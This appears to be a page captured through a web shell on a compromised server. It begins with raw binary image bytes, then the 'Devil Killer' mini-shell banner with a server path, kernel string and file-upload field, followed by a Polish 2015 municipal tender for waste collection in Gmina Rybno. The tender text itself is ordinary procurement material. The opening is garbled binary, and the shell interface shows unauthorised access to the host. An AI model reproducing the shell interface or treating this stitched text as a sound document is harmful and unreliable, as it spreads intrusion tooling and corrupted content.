JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150701/162178-N-2015.html

<p class="kh_header"><b>Rybno: Odbiór i zagospoadarowanie odpadówkomunalnych z nieruchomości zamieszkałych z terenu Gminy Rybno.</b><br>
<b>Numer ogłoszenia: 162178 - 2015; data zamieszczenia: 01.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rybno , ul. Długa 20, 96-514 Rybno, woj. mazowieckie, tel. 046 8611438, faks 046 8611438.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospoadarowanie odpadówkomunalnych z nieruchomości zamieszkałych z terenu Gminy Rybno..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbieranie i  zagospodarowanie (odzysku lub unieszkodliwienie) , wskazanych w opisie zamówienia odpadów komunalnych  z nieruchomości zamieszkałych  na terenie Gminy Rybno w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania zgodnie z: zapisami ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz.U. z 2013 r. poz. 1399  z późn. zm.),zapisami Wojewódzkiego Planu Gospodarki Odpadami dla Mazowsza , przyjętego  uchwałą  Sejmiku Województwa Mazowieckiego nr 211/12  z dnia 22.10.2012 roku w sprawie wykonania Wojewódzkiego Planu Gospodarki Odpadami dla Mazowsza na lata 2012-2017 z uwzględnieniem lat 2018-2023 z załącznikami oraz  przepisami  prawa miejscowego. W niniejszym opisie przedmiotu zamówienia przez  pojęcie właściciela nieruchomości należy rozumieć także współwłaścicieli, użytkowników wieczystych oraz jednostki organizacyjne i osoby posiadające nieruchomości  w zarządzie lub użytkowaniu, a także inne podmioty władające nieruchomością. Odbieranie odpadów komunalnych z zabudowy jednorodzinnej .Na terenie zabudowy jednorodzinnej obowiązywać będzie pojemnikowo- workowy system zbiórki odpadów komunalnych:Niesegregowane (zmieszane) odpady komunalne (kod odpadu 20 03 01):Niesegregowane (zmieszane) odpady komunalne odbierane będą z pojemników  o pojemności 120 l lub 240 l. i worków  o pojemności 120 l w przypadku przepełnienia pojemnika. 
Częstotliwość odbioru i wywozu niesegregowanych (zmieszanych) odpadów komunalnych - 1  raz na tygodnie,zgodnie z harmonogramem przedłożonym przez Wykonawcę, uzgodnionym i zaakceptowanym przez Zamawiającego w godzinach   (7.00-20.00)
Selektywnie zebrane odpady komunalne (odpady segregowane), w tym odpady  (kody: 15 01 01, 15 01 02, 15 01 04, 15 01 07, 20 01 01, 20 01 02, 20 01 13, 20 01 14, 20 01 15, 20 01 17, 20 01 19, 20 01 21, 20 01 23, 20 01 26, 20 01 27, 20 01 28, 20 01 29, 20 01 30, 20 01 33, 20 01 34, 20 01 35, 20 01 36, 20 01 39, 20 01 40, ex 20 01 99, 20 02 01, 16 01 03, 17 01 01, 17 01 02, 17 01 03, 17 01 07, 17 02 01, 17 02 02, 17 02 03, 17 03 02, 17 04 01, 17 04 02, 17 04 03, 17 04 04, 17 04 05, 17 04 06, 17 04 07,  17 04 11, 17 05 08, 17 06 04, 17 08 02, 17 09 04, ex 20 03 99, 20 03 07 ). 

a) Odbiór selektywnie zebranych odpadów komunalnych na terenie zabudowy jednorodzinnej będzie się odbywać w systemie workowym. 
b)Worki do odbioru od właścicieli nieruchomości, selektywnie zebranych odpadów komunalnych zapewnia Wykonawca. 
Przedmiotowe worki powinny posiadać następujące parametry:
-	materiał: folia polietylenowa LDPE, półprzezroczysta,
-	pojemność: minimalna pojemność: 120 l.,  o grubości 
-	kolor - Wykonawca powinien zapewnić worki w co najmniej 3 kolorach: niebieski- papier, zielony-szkło, żółty- plastik, opakowania wielomateriałowe, metale, 
-	grubość - zapewniającej odpowiednią wytrzymałość mechaniczną worków, tj. co najmniej 60 mikronów
-	  dla odpadów zielonych  wykonawca winien zapewnić worki perforowane w kolorze brązowym, 
-	oznakowanie - worki winny być opatrzone nadrukiem jednostronnym , na jaki rodzaj odpadu są przeznaczone  i zawierać informację jakie odpady winny być umieszczane w worku. Dodatkowo na workach może widnieć adres i dane kontaktowe Wykonawcy.
   c) Worki do odbioru selektywnie zbieranych odpadów komunalnych Wykonawca zobowiązany jest dostarczać w  ilościach zapewniających sprawne funkcjonowanie systemu.
   d) Częstotliwość odbioru i wywozu - worki z odpadami selektywnie zebranymi odbierane  będą  w okresie marzec    -październik co 4 tygodnie a w miesiącach listopad - luty co 8 tygodni  zgodnie z harmonogramem przedłożonym przez      Wykonawcę, uzgodnionym i zaakceptowanym przez Zamawiającego w godzinach   (7.00-20.00)
  e) Obowiązkiem Wykonawcy będzie uzupełnianie na własny koszt właścicielom nieruchomości jednorodzinnych, worków do selektywnego zbierania odpadów komunalnych po każdorazowym odbiorze, poprzez pozostawienie na nieruchomości nowych, pustych worków w dniu odbioru selektywnie zebranych odpadów komunalnych, w tej samej ilości dla danego rodzaju co worki odebrane. Dotyczy tylko zabudowy jednorodzinnej i osób, które zdeklarowały, iż będą segregować odpady  komunalne.
f) Meble , odpady wielkogabarytowe  , chemikalia,   zużyte opony  wystawione przez właścicieli przed nieruchomości  będą odbierane  przez  Wykonawcę w ustalonych wcześniej terminach   w  godzinach  (7.00- 20.00)
g) Odpady budowlane i rozbiórkowe odbierane będą wyznaczonych miejsc w formie mobilnego punktu   selektywnej    na zgłoszenie w ciągu  4 tygodni w  godzinach  (7.00- 20.00)
h)  Częstotliwość odbioru prze Wykonawcę odpadów zielonych 5 razy w roku w okresie  maj-  wrzesień. Przy jednorazowym odbiorze worków na odpady z każdego punktu odbioru w zabudowie jednorodzinnej Wykonawca odbierający odpady zobowiązany jest do pozostawienia 3 worków  brązowych.
 W ofercie Wykonawca może zadeklarować dodatkowe terminy odbioru odpadów zielonych                                 w terminach obejmujących następujące miesiące : kwiecień  , październik
i) Zużyte baterie , akumulatory będą odbierane przez Wykonawcę z wyznaczonych miejsc na terenie Gminy Rybno na zgłoszenie telefoniczne  o zapełnieniu pojemników ,  w ciągu 48 godzin.
j)  Zużyty  sprzęt elektryczny  i elektroniczny co  4  tygodnie.

3. Dane ilościowe pozwalające ocenić (oszacować) wartość Zamówienia (nie stanowiące limitów zamówienia):

1)	Szacuje się, że na terenie Gminy Rybno istnieje ok. 822 nieruchomości w zabudowie jednorodzinnej;
2)	Powierzchnia Gminy Rybno wynosi 72,84 km2;
3)	Liczba mieszkańców zameldowanych  na terenie Gminy Rybno  na dzień 31grudnia 2014 r. - 3499 osób; liczba mieszkańców objętych systemem gospodarowania odpadami - 3282 osoby.
4)	Gmina Rybno posiada na swoim terenie ok.100 km dróg;
5)	Odbiór odpadów z zabudowy jednorodzinnej z pojemników 120 i 240l.;
6)	Ilość odpadów odebranych z terenu Gminy Rybno, określona na podstawie sprawozdań składanych przez przedsiębiorców posiadających zezwolenie na odbieranie odpadów komunalnych w roku 2014 wyniosła:
a)	Zmieszane odpady komunalne - 410,7 Mg;
b)	Opakowania z papieru i tektury - 4,8 Mg;
c)	Opakowania ze szkła - 8,1 Mg;
d)	Opakowania z tworzyw sztucznych - 23,8 Mg;

Przedmiotem zamówienia nie jest objęte odbieranie i zagospodarowanie odpadów komunalnych z terenu gminy    z nieruchomości niezamieszkałych .
Struktura mieszkańców Gminy w zakresie postępowania z odpadami komunalnymi  ( na dzień 29.06. 2015 r.):
Udział osób segregujących odpady - 96,00% *
Udział osób niesegregujących odpady - 4,00% *
Uwaga (*)
*-Zamawiający zastrzega sobie prawo zmiany procentu udziału osób niesegregujących i segregujących odpady.  Ich procentowy udział w ciągu okresu realizacji zamówienia może ulec zmianie.

Orientacyjna liczba nieruchomości z których będą odbierane odpady komunalne.
1.	Antosin - Liczba nieruchomości - budynków 29 , liczba punktów odbioru 30 Liczba osób 88
2.	Aleksandrów - Liczba nieruchomości - budynków 25 , liczba punktów odbioru 29 Liczba osób 123
3.	Bronisławy - Liczba nieruchomości - budynków 24 , liczba punktów odbioru 27 Liczba osób 70
4.	 Cypriany - Liczba nieruchomości - budynków 39 , liczba punktów odbioru 44 Liczba osób 157
5.	- Ćmiszew Parcel- Liczba nieruchomości - budynków 18 , liczba punktów odbioru 23 Liczba osób 80
6.	 Ćmiszew Rybnowski - Liczba nieruchomości - budynków 26 , liczba punktów odbioru 29 Liczba osób 107
7.	Erminów - Liczba nieruchomości - budynków 37 , liczba punktów odbioru 42 Liczba osób 162
8.	 Jasieniec - Liczba nieruchomości - budynków 44 , liczba punktów odbioru 48 Liczba osób 182
9.	Józin - Liczba nieruchomości - budynków 23 , liczba punktów odbioru 24 Liczba osób 91
10.	Kamieńszczyzna - Liczba nieruchomości - budynków 20 , liczba punktów odbioru 23 Liczba osób 86
11.	Konstantynów - Liczba nieruchomości - budynków 26 , liczba punktów odbioru 27 Liczba osób 113
12.	Karolków Szwarocki  - Liczba nieruchomości - budynków 38 , liczba punktów odbioru 45 Liczba osób 141
13.	Karolków Rybnowski - Liczba nieruchomości - budynków 27 , liczba punktów odbioru 28 Liczba osób 120
14.	Koszajec - Liczba nieruchomości - budynków 20 , liczba punktów odbioru 22 Liczba osób 56
15.	 Ludwików - Liczba nieruchomości - budynków 17 , liczba punktów odbioru 20 Liczba osób 77
16.	Nowy Szwarocin - Liczba nieruchomości - budynków 22 , liczba punktów odbioru 26 Liczba osób 99
17.	Nowa Wieś - Liczba nieruchomości - budynków 22 , liczba punktów odbioru 25 Liczba osób 81
18.	Matyldów - Liczba nieruchomości - budynków 30 , liczba punktów odbioru 33 Liczba osób 107
19.	Rybionek - Liczba nieruchomości - budynków 11 , liczba punktów odbioru 12 Liczba osób 48
20.	Rybno - Liczba nieruchomości - budynków 153 , liczba punktów odbioru 169 Liczba osób 564
21.	Sarnów - Liczba nieruchomości - budynków 40 , liczba punktów odbioru 43 Liczba osób 147
22.	Stary Szwarocin - Liczba nieruchomości - budynków 20 , liczba punktów odbioru 21 Liczba osób 99
23.	Wesoła - Liczba nieruchomości - budynków 16 , liczba punktów odbioru 17 Liczba osób 79
24.	Wężyki - Liczba nieruchomości - budynków 55 , liczba punktów odbioru 66 Liczba osób 256
25.	Złota - Liczba nieruchomości - budynków 41 , liczba punktów odbioru 44 Liczba osób 149
Razem. - Liczba nieruchomości - budynków 823 , liczba punktów odbioru 917 Liczba osób 3282

 Obowiązki Wykonawcy:

1)	W dniu podpisania umowy zostanie przekazany wykaz nieruchomości. Na podstawie w/w wykazu przed rozpoczęciem realizacji zamówienia Wykonawca opracuje harmonogram odbioru  wywozu odpadów na II półrocze 2015  nie później niż w ciągu 10 dni od podpisania umowy. Harmonogramy na kolejna lata będą sporządzane na podstawie terminów zawartych w harmonogramie w 2015r. W harmonogramie Wykonawca uwzględni  termin ostatniego odbioru  odpadów w ostatnim tygodniu miesiąca  trwania umowy.

2)	Wykonawca zobowiązany będzie do dystrybucji harmonogramów wśród właścicieli nieruchomości w ciągu 7 dni od ich zatwierdzenia przez Zamawiającego. Wykonawca zobowiązany będzie również do dystrybucji wśród właścicieli nieruchomości innych dokumentów związanych z systemem gospodarki odpadami (tj.: ulotek, ogłoszeń itp.).

3)	Wykonawca  ma obowiązek wyposażenia miejsc gromadzenia odpadów komunalnych  w niezbędne  pojemniki oraz w  worki przed pierwszym dniem obowiązywania  umowy na odbiór odpadów zawartej  z Zamawiającym. Wykonawca zobowiązany jest dostosować wielkość pojemników do ilości osób zamieszkujących poszczególne nieruchomości .Na potwierdzenie dostarczenia pojemników Wykonawca przedłoży Zamawiającemu potwierdzenia od właścicieli nieruchomości opatrzone datą przekazania i podpisem właściciela  bądź jego przedstawiciela .W przypadku niemożności spełnienia tego warunku z przyczyn niezależnych od Wykonawcy wskaże on Zamawiającemu te przyczyny na piśmie i udokumentuje ich zaistnienie. Za dowód mogą być uznane wskazania urządzeń kontrolujących czas i przebieg tras pojazdów. Za przyczyny niezależne  od Wykonawcy można będzie uznać w szczególności, co najmniej trzykrotne niezastanie właściciela nieruchomości pod wskazanym adresem w odstępach , co najmniej 3 dniowych w godzinach  7.00-.20.00
4)	Zamawiający  będzie przekazywał Wykonawcy w formie pisemnej , informację o zmianach w liczbie i lokalizacji nieruchomości objętych obowiązkiem odbierania odpadów.
5)	Wykonawca zobowiązany będzie, w zakresie przedmiotu zamówienia do monitorowania wywiązywania się przez właścicieli nieruchomości z obowiązku selektywnego zbierania odpadów komunalnych. W przypadku stwierdzenia, że właściciel nieruchomości nie dokonuje segregacji odpadów, Wykonawca odbiera odpady jako niesegregowane (zmieszane) odpady komunalne. Wykonawca zobowiązany będzie w terminie 5 dni roboczych od dnia zaistnienia opisanej sytuacji do poinformowania Zamawiającego w formie pisemnej, o niewywiązaniu się z obowiązków segregacji odpadów przez właściciela nieruchomości. Do informacji Wykonawca zobowiązany będzie załączyć dokumentację w formie fotografii nieruchomości i protokół z zaistnienia takiego zdarzenia. Z dokumentacji musi jednoznacznie wynikać, jakiej dotyczy nieruchomości i w jakim dniu doszło do ustalenia ww.  zdarzenia;
6)	Wykonawca jest zobowiązany do przedkładania Zamawiającemu raportów miesięcznych zawierających informacje   o ilości i rodzaju wydanych pojemników i worków w terminie 7 dni roboczych od dnia zakończenia danego miesiąca. 
7)	Wykonawca zobowiązany jest również do przekazywania comiesięcznych wykazów w formie papierowej podpisanej przez osobę wskazaną do realizacji umowy   potwierdzających odbiór odpadów zmieszanych i selektywnych od mieszkańców z zaznaczeniem adresu nieruchomości , rodzaju odpadu i ilości odebranych pojemników oraz worków. W wykazie tym Wykonawca wskaże również , z której nieruchomości nie zostały odebrane odpady ( pojemnik  czy worki).
8)	W trakcie wykonywania umowy Wykonawca jest zobowiązany do wyposażenia , zgłaszanych przez Zamawiającego miejsc gromadzenia odpadów w niezbędne pojemniki nie później niż w ciągu 3 dni roboczych od dnia zgłoszenia. Wykonawca dokona zmiany pojemnika na mniejszy lub większy na wniosek osób zamieszkujących daną nieruchomość w uzgodnieniu z Zamawiającym.
9)	Wykonawca odpowiada za informowanie mieszkańców Gminy Rybno o terminach odbierania poszczególnych rodzajów odpadów komunalnych oraz zasadach ich segregowania. W tym celu Wykonawca w uzgodnieniu z Zamawiającym sporządza harmonogram odbioru odpadów komunalnych oraz informacje o zasadach segregowania odpadów. Harmonogram oraz informacje o zasadach segregowania odpadów Zamawiający będzie publikował na swojej stronie internetowej oraz tablicy ogłoszeń. Wykonawca jest również odpowiedzialny za powielanie i dystrybucję do mieszkańców przy pierwszej i każdej kolejnej zmianie harmonogramu odbioru odpadów komunalnych oraz informacji o zasadach segregowania.
10)	Wykonawca zobowiązany będzie do zabierania dostawionych przy pojemnikach worków z odpadami  komunalnymi (właściciele nieruchomości mają możliwość dostawienia tego rodzaju worków w przypadku, gdy pojemność pojemnika w danym okresie miesiąca będzie niewystarczająca) oraz poinformowania Zamawiającego o miejscach odbioru tego rodzaju worków, w celu przeprowadzenia kontroli ilości osób zamieszkujących daną nieruchomość; Wykonawca zobowiązuje się do odbierania odpadów w sposób zapewniający utrzymanie odpowiedniego stanu sanitarnego , w szczególności  do:
a)	zapobiegania wysypywania się odpadów z pojemników i worków podczas dokonywania odbioru.
b)	Wykonawca jest zobowiązany do zebrania także odpadów leżących obok pojemników i worków jeśli jest to wynikiem jego działalności.
11)	Wykonawca zobowiązany będzie  do odbioru i transportu odpadów , również w przypadkach, kiedy dojazd do
 nieruchomości , z których są odbierane odpady komunalne  będzie znacznie utrudniony z powodu  remontów dróg, dojazdów itp. w takich przypadkach Wykonawcy nie przysługują roszczenia z tytułu wzrostu kosztów realizacji przedmiotu umowy. Wykonawca jest obowiązany do realizacji reklamacji  (nieodebranie                              z nieruchomości odpadów zgodnie   z harmonogramem, niepozostawienie worków na odpady segregowane itp.) w przeciągu 48 godzin od otrzymania zawiadomienia e-mailem lub telefonicznie od Zamawiającego. Załatwienie reklamacji należy niezwłocznie potwierdzić e-mailem do Zamawiającego;
12)	Podmiot odbierający odpady komunalne jest zobowiązany do przekazywania odebranych od właścicieli nieruchomości odpadów:
a) Selektywnie zebranych odpadów komunalnych bezpośrednio lub za pośrednictwem innego zbierającego odpady do instalacji odzysku lub unieszkodliwienia odpadów zgodnie z hierarchią sposobów postępowania z odpadami     o której mowa w art.17 ustawy z dnia 14 grudnia 2012r. o odpadach.
  b) Zmieszanych odpadów komunalnych oraz odpadów zielonych bezpośrednio do regionalnej instalacji         do przetwarzania odpadów komunalnych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających o których mowa w art. 67 ust.1 pkt.6 ustawy do 20% wartości zamówienia podstawowego które, będą polegały na powtórzeniu tego samego rodzaju zamówień i będą zgodne z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.53.30.00-2, 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający działając na podstawie art.45 ust. 2 ustawy wymaga wniesienia wadium w wysokości  wysokości:    9.000,00 zł (słownie:dziewięć tysięcy złotych  )</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. W tym zakresie Zamawiający wymaga, aby Wykonawca posiadał:

a)	aktualne zezwolenie na prowadzenie działalności w zakresie transportu odpadów komunalnych wydane przez właściwego starostę, wymagane na podstawie ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz.U. z 2013 r., poz. 21 z późn. zm.),
b)	aktualny wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości wymagany na podstawie ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t. j. Dz. U. z 2013 r. poz. 1399 z późn. zm.).
2.	Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu

1)	ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych w niniejszej Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia / nie spełnia, tzn. każdy z Wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia Wykonawcy;
2)	sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin pracy Komisji przetargowej powołanej w Urzędzie Gminy Rybno  do  przeprowadzania  postępowań o udzielenie zamówień publicznych.
3)	w przypadku złożenia przez Wykonawcę dokumentów zawierających dane finansowe wyrażone w walutach innych niż PLN, sprawdzenie  spełnienia warunków nastąpi poprzez przeliczenie tej waluty na PLN według bieżącego kursu średniego walut obcych w złotych na podstawie tabeli kursów Narodowego Banku Polskiego            z dnia publikacji ogłoszenia o niniejszym zamówieniu w  Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 Ustawy, tj. warunki dotyczące:posiadania wiedzy i doświadczenia.
W tym zakresie Zamawiający wymaga, aby Wykonawca wykonał, a w przypadku usług okresowych lub ciągłych również wykonał lub    wykonuje w okresie trzech lat przed dniem upływu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługi odbierania i transportu odpadów komunalnych z nieruchomości,   w sposób ciągły przez okres minimum 12 miesięcy o łącznej masie min.500 Mg niesegregowanych (zmieszanych) odpadów komunalnych (20 03 01). Fakt należytego wykonania usługi należy udokumentować stosownym dowodem. 
 2.Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu
1)ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych w niniejszej Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia / nie spełnia, tzn. każdy z Wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia Wykonawcy;
2) sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin pracy Komisji przetargowej powołanej w Urzędzie Gminy Rybno  do  przeprowadzania  postępowań o udzielenie zamówień publicznych.
3) w przypadku złożenia przez Wykonawcę dokumentów zawierających dane finansowe wyrażone w walutach innych niż PLN, sprawdzenie  spełnienia warunków nastąpi poprzez przeliczenie tej waluty na PLN według bieżącego kursu średniego walut obcych w złotych na podstawie tabeli kursów Narodowego Banku Polskiego            z dnia publikacji ogłoszenia o niniejszym zamówieniu w  Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 Ustawy, tj. warunki dotyczące: dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
W tym zakresie Zamawiający wymaga, aby Wykonawca na dzień otwarcia ofert, spełniał wymagania określone             w Rozporządzeniu Ministra  Środowiska z dnia 11 stycznia 2013 roku w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U. z 2013 r. poz.122);  a w szczególności dysponował co najmniej:
a)	1 pojazdem przystosowanym do odbierania zmieszanych odpadów komunalnych,
b)	1 pojazdem przystosowanym do odbierania selektywnie zebranych odpadów komunalnych,
c)	1 pojazdem do odbierania odpadów bez funkcji kompaktującej.

2.Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu

1)ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych w niniejszej Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia / nie spełnia, tzn. każdy z Wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia Wykonawcy;
